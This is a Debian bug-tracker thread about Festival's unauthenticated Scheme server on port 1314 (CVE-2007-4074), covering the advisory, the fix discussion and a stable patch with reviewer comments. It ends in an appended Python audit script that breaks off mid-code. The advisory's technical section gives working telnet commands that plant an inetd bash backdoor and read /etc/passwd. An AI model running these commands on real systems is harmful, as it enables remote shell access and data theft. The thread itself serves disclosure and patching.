Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-03-01 Thread Nico Golde
Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-03-01 16:19]:
> On Saturday 01 March 2008 14:44:01 Nico Golde wrote:
[...] 
> > Huh? "which allows local and remote attackers to execute
> > arbitrary commands"
[...] 
> I saw that, but assumed it would reference Debian in some manner.  After all 
> Debian distributions (and derivatives including Ubuntu hardy) are/were 
> exploitable.

Nope I don't think that will happen :/
Cheers
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-03-01 Thread Tim Brown
On Saturday 01 March 2008 14:44:01 Nico Golde wrote:
> Hi Tim,
>
> * Tim Brown <[EMAIL PROTECTED]> [2008-03-01 15:28]:
> > On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:
> > > > It
> > > > probably also needs rewording since SuSE confirmed it affected them
> > > > and I think we agree it affects Debian.  How do we go about doing
> > > > that - is that something for you guys or do I need to get involved?
> > >
> > > I see your point, I will contact mitre to update the CVE id
> > > or to assign a new one.
> >
> > No news from MITRE? At least their CVE entry doesn't appear to be
> > updated.
>
> Huh? "which allows local and remote attackers to execute
> arbitrary commands"
> Cheers
> Nico

I saw that, but assumed it would reference Debian in some manner.  After all 
Debian distributions (and derivatives including Ubuntu hardy) are/were 
exploitable.

Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-03-01 Thread Nico Golde
Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-03-01 15:28]:
> On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:
> 
> > > It
> > > probably also needs rewording since SuSE confirmed it affected them and I
> > > think we agree it affects Debian.  How do we go about doing that - is
> > > that something for you guys or do I need to get involved?
> >
> > I see your point, I will contact mitre to update the CVE id
> > or to assign a new one.
> 
> No news from MITRE? At least their CVE entry doesn't appear to be updated.

Huh? "which allows local and remote attackers to execute 
arbitrary commands"
Cheers
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-03-01 Thread Tim Brown
On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:

> > It
> > probably also needs rewording since SuSE confirmed it affected them and I
> > think we agree it affects Debian.  How do we go about doing that - is
> > that something for you guys or do I need to get involved?
>
> I see your point, I will contact mitre to update the CVE id
> or to assign a new one.

No news from MITRE? At least their CVE entry doesn't appear to be updated.

> I guess they will happily release a DSA if someone comes up
> and provides a fixed stable package that just works.

I've attached a patch that I think resolves this issue on stable - no 
warranties.  Just wanted to make this final email as I'm intending to release 
my advisory shortly subject to any updates here.

Tim
-- 
Tim Brown


diff -rN festival-1.4.3/debian/changelog festival-1.4.3-new/debian/changelog
0a1,18
> festival (1.4.3-17.3) unstable; urgency=high
> 
>   * Fix root security hole. Thanks to Tim Brown.
> + debian/festival.init: Read festival.scm upon start.
>   (Closes: #466146)
>   * debian/festival.scm:
> + Add sane default values for server. The festival
>   init script now uses these values while starting the
>   server.
>   * debian/README.Debian:
> + Document some changes on daemon mode.
>   * debian/templates, debian/config, debian/festival.postinst:
> + Ask for server password during install.
>   * debian/lintian-override:
> + Permission of /etc/festival.scm should be 0600.
> 
>  -- Tim Brown <[EMAIL PROTECTED]>  Sat, 01 Mar 2008 12:40:33 +
> 
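Review bot: the changelog entry cites the bug but not the CVE; for a security upload the entry should also name CVE-2007-4074 (the id this bug was retitled to) so the security tracker can match it, e.g. `* Fix root security hole (CVE-2007-4074). Thanks to Tim Brown.` The lintian-override item says /etc/festival.scm should be 0600, but the postinst in this patch only does `chmod og-r`, so the two should be brought in line (an explicit `chmod 0600` in postinst is the simpler way).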
diff -rN festival-1.4.3/debian/config festival-1.4.3-new/debian/config
0a1,20
> #!/bin/sh -e
> 
> # Source debconf library.
> . /usr/share/debconf/confmodule
> 
> # grab selected config values from the config file and store them
> # in debconf's database
> 
> # first grab existing value (keep config file's existing value)
> CONFIG_FILE=/etc/festival.scm
> 
> # to help security, let password be entered afresh each time
> # (and don't display the value left in the debconf database of
> # "password written to config file")
> db_set festival/server_passwd ""
> 
> db_input critical festival/server_passwd || true
> 
> db_go || true
> db_stop || true
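Review bot: `CONFIG_FILE=/etc/festival.scm` is assigned but never used, and the comment "first grab existing value (keep config file's existing value)" describes a step this script does not perform: the password is cleared with `db_set festival/server_passwd ""` and then asked for unconditionally with `db_input critical`, so every upgrade or dpkg-reconfigure prompts again and postinst overwrites whatever the admin already has in the file. Either drop the dead variable and comment, or skip the prompt when the file already contains a `server_passwd` other than `nil`.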
diff -rN festival-1.4.3/debian/festival.init festival-1.4.3-new/debian/festival.init
27c27
< 		--exec $DAEMON -- --server
---
> 		--exec $DAEMON -- --server -b /etc/festival.scm
39c39
< 		--exec $DAEMON -- --server
---
> 		--exec $DAEMON -- --server -b /etc/festival.scm
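Review bot: the two hunks make the identical change to the start-stop-daemon arguments, so the option string is now duplicated; a single `DAEMON_OPTS="--server -b /etc/festival.scm"` near the top of the init script keeps both start paths in sync. It is also worth checking what the daemon does when /etc/festival.scm is missing or unreadable by the user it runs as (postinst chowns the file to nobody and strips group/other read): a start that silently falls back to the unconfigured defaults would reopen the unauthenticated listener this upload is meant to close, and the init script should fail loudly instead.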
diff -rN festival-1.4.3/debian/festival.postinst festival-1.4.3-new/debian/festival.postinst
0a1,50
> #!/bin/sh
> 
> set -e
> 
> . /usr/share/debconf/confmodule
> 
> # write selected values into config file
> CONFIG_FILE=/etc/festival.scm
> 
> PASSWD_ENTRY=server_passwd
> 
> PASSWD=your_festival_passwd
> db_get festival/server_passwd
> PASSWD="$RET"
> # insert the entry, if it is missing (which it ought not to be)
> grep -Eq "^[[:blank:]]*\(set![[:blank:]][[:blank:]]*$PASSWD_ENTRY[[:blank:]]" $CONFIG_FILE || \
> echo "(set! $PASSWD_ENTRY \"$PASSWD\")" >> $CONFIG_FILE
> 
> # only process the password if it is not empty
> if [ "$PASSWD" ]; then
> # copy config file here in order to preserve permissions when actually
> # building the tmp file in the sed step
> cp -a -f $CONFIG_FILE $CONFIG_FILE.tmp
> 
> # escape sed special characters
> #echo $PASSWD | sed -n 's|[\|\$\&\.\*\%\^\+\?]|\\&|g'
> PASSWD=$(echo $PASSWD | sed 's|[\[\(\)\|\$\&\.\*\%\^\+\?\/]|\\&|g')
> sed -e "s/(set.[[:blank:]]\+$PASSWD_ENTRY.*)/(set! $PASSWD_ENTRY \"$PASSWD\")/" \
> 	< $CONFIG_FILE > $CONFIG_FILE.tmp
> 
> mv -f $CONFIG_FILE.tmp $CONFIG_FILE
> # remove the password from the debconf database
> db_set festival/server_passwd "password written to config file"
> 
> fi
> 
> # extra safety check: ensure passwords in config file cannot be read by anyone
> chown nobody /etc/festival.scm
> chmod og-r $CONFIG_FILE
> 
> # Supporta log file
> mkdir -p /var/log/festival
> touch /var/log/festival/festival.log
> chown nobody:audio /var/log/festival/festival.log
> 
> # must indicate we are done with debconf, or the script will hang when the
> # server is started below (DEBHELPER section, via dh_installinit).
> db_stop
> 
> #DEBHELPER#
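Review bot: the password handling has several correctness gaps. `PASSWD=your_festival_passwd` is dead code, overwritten by `PASSWD="$RET"` two lines later. `echo $PASSWD` is unquoted, so a password containing whitespace, or starting with `-n`, is mangled before it reaches sed; use `printf '%s\n' "$PASSWD"`. The sed escape list covers regex metacharacters but neither backslash nor `"`, so a password containing either produces a broken `(set! server_passwd "...")` string in the file. The grep/echo fallback runs before the `if [ "$PASSWD" ]` test, so an empty debconf answer appends `(set! server_passwd "")` in place of the shipped `nil`, which at best is a different kind of "no password" and at worst an empty password. The sed output is written into `$CONFIG_FILE.tmp` with whatever mode the shipped file had, and `chmod og-r` only runs further down, so on a fresh install the password is briefly readable by other users; set `umask 077` or do the chmod before writing. Minor: `chown nobody /etc/festival.scm` hardcodes a path the rest of the script takes from `$CONFIG_FILE`, and "Supporta" is a typo.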
diff -rN festival-1.4.3/debian/festival.postrm festival-1.4.3-new/debian/festival.postrm
4a5,9
> if [ "$1" = "purge" ];then
> rm -rf /var/log/festival
> rm -f /etc/festival.scm
> fi
> 
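Review bot: `rm -f /etc/festival.scm` on purge should not be needed if the file is shipped under /etc, because dpkg then treats it as a conffile and removes it on purge itself; the larger problem is that a conffile must not be rewritten by maintainer scripts (Policy 10.7.3), and postinst in this patch does exactly that, which will make dpkg prompt about a locally modified conffile on the next upgrade. If postinst keeps writing the password into the file, generate /etc/festival.scm from a template outside /etc instead of shipping it as a conffile (then removing it on purge here is correct). Style: `];then` should be `]; then`.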
diff -rN festival-1.4.3/debian/festival.scm festival-1.4.3-new/debian/festival.scm
3a4,23
> 
> ; Maximum number of clients on the server
> (set! server_max_clients 10)
> 
> ; Server port
> (set! server_port 1314)
> 
> ; Server password
> (set! server_passwd nil)
> 
> ; Log file location
> (set! server_log_file "/var/log/festival/festival.log")
> 
> ; Server access list (hosts)
> ; Example:
> ; (set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))
> ; Secure default:
> (s
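Review bot: the shipped default `(set! server_passwd nil)` means the file carries no authentication until postinst succeeds in rewriting it, so the init script change and the postinst must both land for the fix to hold. The "Secure default" for `server_access_list` is cut off after `(s` in the copy of the patch attached here, so the value that actually ships cannot be reviewed; please resend the full hunk. Note also that the commented example list includes `"[^.]+"`, which matches any unqualified hostname, so it should not be mistaken for a localhost-only setting.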

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Nico Golde
Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:57]:
> On Tuesday 19 February 2008 19:20:23 Nico Golde wrote:
> 
> > * Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:08]:
> > > I've just noticed that the security tracker
> > > http://security-tracker.debian.net/tracker/status/release/unstable has
> > > been updated for festival.  However it is wrong.  This bug *is* remotely
> > > exploitable (due to the aforementioned lack of ACLs).
> >
> > Sure it is :) The remote exploitability status isn't set
> > manually by us. This is extracted automatically from the NVD
> > text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which
> > doesn't mention the word 'remote'. I think that's the
> > reason. Patches welcome :)
> 
> Okay, so the CVE entry is wrong (which probably explains why it wasn't 
> correctly resolved by the maintainers when it was first looked at).

Maybe it's also the Access Vector: string, not sure. Florian 
Weimer knows the details.

> It 
> probably also needs rewording since SuSE confirmed it affected them and I 
> think we agree it affects Debian.  How do we go about doing that - is that 
> something for you guys or do I need to get involved?

I see your point, I will contact mitre to update the CVE id 
or to assign a new one.

> Also, since we have a working patch for the issue on mentors what happens 
> now.  
> Can it go through as NMU?

The maintainer already uploaded a fixed version to unstable 
so no need for that. An NMU is only needed if the maintainer 
can't do an upload himself.

> What about the backport to stable and testing?

The package should migrate to testing in two days. If it has 
problems on migration we may do a testing security upload 
for this. For stable please contact. Referring to our svn 
the stable security did not release a DSA for CVE-2007-4074 
because it was a minor issue. If you think this should get 
fixed in stable please contact [EMAIL PROTECTED]

I guess they will happily release a DSA if someone comes up 
and provides a fixed stable package that just works.

If not, the maintainer still has a high chance to get this 
fixed via a regular point update. For this please contact 
the release team.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Tim Brown
On Tuesday 19 February 2008 19:20:23 Nico Golde wrote:

> * Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:08]:
> > I've just noticed that the security tracker
> > http://security-tracker.debian.net/tracker/status/release/unstable has
> > been updated for festival.  However it is wrong.  This bug *is* remotely
> > exploitable (due to the aforementioned lack of ACLs).
>
> Sure it is :) The remote exploitability status isn't set
> manually by us. This is extracted automatically from the NVD
> text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which
> doesn't mention the word 'remote'. I think that's the
> reason. Patches welcome :)

Okay, so the CVE entry is wrong (which probably explains why it wasn't 
correctly resolved by the maintainers when it was first looked at).  It 
probably also needs rewording since SuSE confirmed it affected them and I 
think we agree it affects Debian.  How do we go about doing that - is that 
something for you guys or do I need to get involved?

Also, since we have a working patch for the issue on mentors what happens now.  
Can it go through as NMU?  What about the backport to stable and testing?

Tim
-- 
Tim Brown


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Nico Golde
Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:08]:
> I've just noticed that the security tracker 
> http://security-tracker.debian.net/tracker/status/release/unstable has been 
> updated for festival.  However it is wrong.  This bug *is* remotely 
> exploitable (due to the aforementioned lack of ACLs).

Sure it is :) The remote exploitability status isn't set 
manually by us. This is extracted automatically from the NVD 
text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which 
doesn't mention the word 'remote'. I think that's the 
reason. Patches welcome :)

Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Tim Brown
Nico,

I've just noticed that the security tracker 
http://security-tracker.debian.net/tracker/status/release/unstable has been 
updated for festival.  However it is wrong.  This bug *is* remotely 
exploitable (due to the aforementioned lack of ACLs).

Tim
-- 
Tim Brown


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Tim Brown

On Tue, 19 Feb 2008, Kumar Appaiah wrote:

> On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote:
> > Hi Tim,
> > this is somehow strange, this CVE id was already fixed in
> > 1.4.3-21 referring to the security tracker (see bug #435445
> > for reference).
> >
> > Did this fix get lost somewhere in the package history?
>
> It appears that the troublesome issue of running festival as a less
> privileged user was handled in the last upload. However, what was not
> handled was the restriction of access to localhost by default, and
> the necessity to introduce a password for this purpose. The last
> upload, which Tim has checked a few times, introduces this feature,
> and thus, makes the security aspect a bit more complete.
>
> Hope this is fine. Thanks for the follow up.

This is my impression too.  Gentoo introduced localhost restrictions in 
their patch for the original issue, in addition to changing the init 
process of the server so that it runs under its own privileges rather than 
root - they didn't add authentication though.  The Debian patch only changed the 
init process of the server, which while preventing a full root compromise, 
did not prevent remote unauthenticated access.

Looking at the previous bug history there was some discussion about 
disabling the system command too, but IMO this does little to fix the 
underlying problem of an unauthenticated scheme interpreter bound to a 
remote port with no ACLs or authentication.


Tim
--
Tim Brown


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Kumar Appaiah
On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote:
> Hi Tim,
> this is somehow strange, this CVE id was already fixed in 
> 1.4.3-21 referring to the security tracker (see bug #435445 
> for reference).
> 
> Did this fix get lost somewhere in the package history?

Dear Nico,

It appears that the troublesome issue of running festival as a less
privileged user was handled in the last upload. However, what was not
handled was the restriction of access to localhost by default, and
the necessity to introduce a password for this purpose. The last
upload, which Tim has checked a few times, introduces this feature,
and thus, makes the security aspect a bit more complete.

Hope this is fine. Thanks for the follow up.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Nico Golde
Hi Tim,
this is somehow strange, this CVE id was already fixed in 
1.4.3-21 referring to the security tracker (see bug #435445 
for reference).

Did this fix get lost somewhere in the package history?
Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.



Processed: Re: Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> retitle 466146 festival: CVE-2007-4074 default configuration allows 
> unauthenticated remote code execution
Bug#466146: festival: Default configuration allows unauthenticated remote code 
execution
Changed Bug title to `festival: CVE-2007-4074 default configuration allows 
unauthenticated remote code execution' from `festival: Default configuration 
allows unauthenticated remote code execution'.
(By the way, that Bug is currently marked as done.)

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Nico Golde
retitle 466146 festival: CVE-2007-4074 default configuration allows 
unauthenticated remote code execution
thanks

Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-02-17 04:18]:
> Package: festival
> Version: 1.96~beta-5
> Severity: critical
> Tags: security
> Justification: root security hole
> 
> Nth Dimension Security Advisory (NDSA20080215)
> Date: 15th February 2008
> Author: Tim Brown 
> URL:  / 
> Product: Festival 1.96:beta July 2004 
> 
> Vendor: Centre for Speech Technology Research, University of Edinburgh 
> 
> Risk: Medium
[...] 

CVE-2007-4074 was assigned to this issue.

==
Name: CVE-2007-4074
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4074
Reference: CONFIRM:http://bugs.gentoo.org/show_bug.cgi?id=170477
Reference: GENTOO:GLSA-200707-10
Reference: URL:http://security.gentoo.org/glsa/glsa-200707-10.xml
Reference: SUSE:SUSE-SR:2007:021
Reference: 
URL:http://lists.opensuse.org/opensuse-security-announce/2007-10/msg6.html
Reference: BID:25069
Reference: URL:http://www.securityfocus.com/bid/25069
Reference: SECUNIA:26229
Reference: URL:http://secunia.com/advisories/26229
Reference: SECUNIA:27271
Reference: URL:http://secunia.com/advisories/27271
Reference: XF:gentoo-festival-privilege-escalation(35606)
Reference: URL:http://xforce.iss.net/xforce/xfdb/35606

The default configuration of Centre for Speech Technology Research
(CSTR) Festival 1.95 beta (aka 2.0 beta) on Gentoo Linux is run
locally with elevated privileges without requiring authentication,
which allows context-dependent attackers to execute arbitrary commands
via the local daemon on port 1314, a different vulnerability than
CVE-2001-0956.

Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-18 Thread Tim Brown
On Monday 18 February 2008 07:42:06 Kumar Appaiah wrote:

> Dear Tim,
>
> Many thanks for the constant support. The package should now be all
> right with this change, available at the same location.

Not a problem - it seems to build cleanly now with no problems.  I guess it 
can be pushed to unstable and backported to stable security.

Tim
-- 
Tim Brown


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Kumar Appaiah
On 18/02/2008, Tim Brown wrote:
> > dget -x
> > http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc
>
> Looks good apart from Lintian reporting:
>
> N:
> N:   chown user.group is called in one of the maintainer scripts. The
> N:   correct syntax is chown user:group. Using "." as a separator is still
> N:   supported by the GNU tools, but it will fail as soon as a system uses
> N:   the "." in user or group names.
> N:

Dear Tim,

Many thanks for the constant support. The package should now be all
right with this change, available at the same location.

dget -x 
http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.

Thanks again!

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600036


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Tim Brown
On Monday 18 February 2008 01:40:00 Kumar Appaiah wrote:
> On Sun, Feb 17, 2008 at 05:32:44PM +, Tim Brown wrote:
> > I've just built it here.  It is lintian clean and the patch provides the
> > required security fix.  However 2 small points, 1) The logging doesn't
> > work as /var/log/festival isn't created (and owned by festival,audio) 2)
> > Passwords are displayed by debconf rather than hiding them with *'s.  I'm
> > only a fellow maintainer, but I'm sure your mentor can provide
> > appropriate feedback on these issues.
>
> First of all, many thanks for pointing out both these issues. I have
> solved both, and the fixed version is here:
>
> dget -x
> http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc

Looks good apart from Lintian reporting:

N:
N:   chown user.group is called in one of the maintainer scripts. The
N:   correct syntax is chown user:group. Using "." as a separator is still
N:   supported by the GNU tools, but it will fail as soon as a system uses
N:   the "." in user or group names.
N:

Tim
-- 
Tim Brown


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Kumar Appaiah
On Sun, Feb 17, 2008 at 05:32:44PM +, Tim Brown wrote:
> I've just built it here.  It is lintian clean and the patch provides the 
> required security fix.  However 2 small points, 1) The logging doesn't work 
> as /var/log/festival isn't created (and owned by festival,audio) 2)  
> Passwords are displayed by debconf rather than hiding them with *'s.  I'm 
> only a fellow maintainer, but I'm sure your mentor can provide appropriate 
> feedback on these issues.

First of all, many thanks for pointing out both these issues. I have
solved both, and the fixed version is here:

dget -x 
http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc


Further comments and feedback would be welcome.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Tim Brown
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote:

> Please note that I now use debconf to ask for the password to be
> entered. I have tested that the system works fine, but as this is my
> first debconf experience, a quick review would be appreciated,
> followed by upload, as this is a security bug.

Another thought, the fix will require backporting to stable so that it can go 
into the security updates.

Tim
-- 
Tim Brown


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Tim Brown
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote:

> dget -x
> http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc
>
> Please note that I now use debconf to ask for the password to be
> entered. I have tested that the system works fine, but as this is my
> first debconf experience, a quick review would be appreciated,
> followed by upload, as this is a security bug.

Kumar,

I've just built it here.  It is lintian clean and the patch provides the 
required security fix.  However 2 small points, 1) The logging doesn't work 
as /var/log/festival isn't created (and owned by festival,audio) 2)  
Passwords are displayed by debconf rather than hiding them with *'s.  I'm 
only a fellow maintainer, but I'm sure your mentor can provide appropriate 
feedback on these issues.

Cheers,
Tim
-- 
Tim Brown


Processed: Re: Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 466146 pending
Bug#466146: festival: Default configuration allows unauthenticated remote code 
execution
Tags were: security
Tags added: pending

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Kumar Appaiah
tags 466146 pending
thanks

On Sun, Feb 17, 2008 at 05:51:38AM +, Tim Brown wrote:
> Can I suggest that a password is set (perhaps take a look at the Debian MySQL 
> server package which does something similar for the debian-sys-maint in 
> the /etc/mysql/debian.cnf file).  Limiting access to local hosts is an 
> improvement, but as noted it does not guard against local privilege 
> escalation attacks.

I have now added this feature. A package is ready for testing at mentors:

dget -x 
http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc

Please note that I now use debconf to ask for the password to be
entered. I have tested that the system works fine, but as this is my
first debconf experience, a quick review would be appreciated,
followed by upload, as this is a security bug.

Thanks.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Kumar Appaiah
On Sun, Feb 17, 2008 at 05:51:38AM +, Tim Brown wrote:
> > A package is ready for upload at mentors. Thanks for the report. If,
> > after consulting my sponsor and some security people, I find that it
> > is OK, it shall be uploaded.
> 
> Kumar,
> 
> Can I suggest that a password is set (perhaps take a look at the Debian MySQL 
> server package which does something similar for the debian-sys-maint in 
> the /etc/mysql/debian.cnf file).  Limiting access to local hosts is an 
> improvement, but as noted it does not guard against local privilege 
> escalation attacks.

I shall make an attempt to arrange for this. Thank you for the
suggestion.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Tim Brown
On Sunday 17 February 2008 05:13:21 Kumar Appaiah wrote:
> tags 466146 pending
> thanks
>
> Hi!
>
> A package is ready for upload at mentors. Thanks for the report. If,
> after consulting my sponsor and some security people, I find that it
> is OK, it shall be uploaded.

Kumar,

Can I suggest that a password is set (perhaps take a look at the Debian MySQL 
server package which does something similar for the debian-sys-maint in 
the /etc/mysql/debian.cnf file).  Limiting access to local hosts is an 
improvement, but as noted it does not guard against local privilege 
escalation attacks.

Tim
-- 
Tim Brown


Processed: Re: Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 466146 pending
Bug#466146: festival: Default configuration allows unauthenticated remote code 
execution
Tags were: security
Tags added: pending

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Kumar Appaiah
tags 466146 pending
thanks

Hi!

A package is ready for upload at mentors. Thanks for the report. If,
after consulting my sponsor and some security people, I find that it
is OK, it shall be uploaded.

Thanks!

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Tim Brown
Package: festival
Version: 1.96~beta-5
Severity: critical
Tags: security
Justification: root security hole

Nth Dimension Security Advisory (NDSA20080215)
Date: 15th February 2008
Author: Tim Brown 
URL:  / 
Product: Festival 1.96:beta July 2004 

Vendor: Centre for Speech Technology Research, University of Edinburgh 

Risk: Medium

Summary

The Festival server is vulnerable to unauthenticated remote code execution.

Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux 
distributions.  The remote form of this vulnerability was identified in
1.96~beta-5 as distributed in Debian unstable.

Technical Details

The Festival server which can be started using festival --server is vulnerable
to unauthenticated remote command execution due to the inclusion of a scheme
interpreter.  It is possible to make use of standard scheme functions in order
to execute further code, like so:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo ' stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")

Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be exploited
the inclusion of a scheme interpreter available without authentication allows
for other vectors of attack.  Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) pose particular interest, for example:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)

Whilst it is acknowledged that the inclusion of the scheme interpreter in this
manner is entirely intentional, the default insecure state of the server could
be exploited particularly where the user is unaware of the server's existence.

Solutions

In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to the
affected port using a host based firewall.  The server itself can be secured by
applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477.
This includes applying a default configuration which limits access to localhost
and setting an optional password which prevents unauthenticated access.

-- System Information:
Debian Release: lenny/sid
  APT prefers oldstable
  APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 
'stable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages festival depends on:
ii  adduser 3.105add and remove users and groups
ii  libaudiofile0   0.2.6-7  Open-source version of SGI's audio
ii  libc6   2.7-8GNU C Library: Shared libraries
ii  libesd0 0.2.36-3 Enlightened Sound Daemon - Shared 
ii  libestools1.2   1:1.2.96~beta-2  Edinburgh Speech Tools Library
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libncurses5 5.6+20080203-1   Shared libraries for terminal hand
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3
ii  lsb-base3.1-24   Linux Standard Base 3.1 init scrip
ii  sgml-base   1.26 SGML infrastructure and SGML catal
ii  sysv-rc 2.86.ds1-53  System-V-like runlevel change mech

Versions of packages festival recommends:
ii  festvox-kallpc16k [festival-v 1.4.0-5American English male speaker for 

-- no debconf information
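The advisory's Solutions section names two settings that close the hole: a server password and an access list limited to localhost, and the stable patch earlier in the thread writes the password into /etc/festival.scm with sed. As an added defender's example, not code from the advisory, the festival package or Debian, the Python below audits a festival.scm-style file for those two settings and builds a correctly escaped `(set! server_passwd ...)` line. It assumes the one-`(set! name value)`-per-line layout of the thread's debian/festival.scm, that `nil` or `""` means no password, that an absent or `nil` access list means no host restriction, that `localhost`, `localhost.*` and `127.0.0.1` are the only local-only patterns, and that the Scheme strings use backslash escapes for `\` and `"`; the two sample configurations are constructed for the example.

```python
"""Audit a Festival server configuration for unauthenticated access.

Added example for the festival bug thread; not code from the advisory,
the festival package or Debian.  It understands only the single-line
`(set! name value)` form used in the thread's debian/festival.scm
(assumption) and reports the weak settings the advisory describes.
"""
import re

# One `(set! name value)` per line; comments start with ';' (assumption:
# the layout used in the thread's debian/festival.scm).
SET_RE = re.compile(r'^\s*\(set!\s+(\S+)\s+(.*?)\)\s*$')
# A double-quoted Scheme string, allowing backslash escapes inside it.
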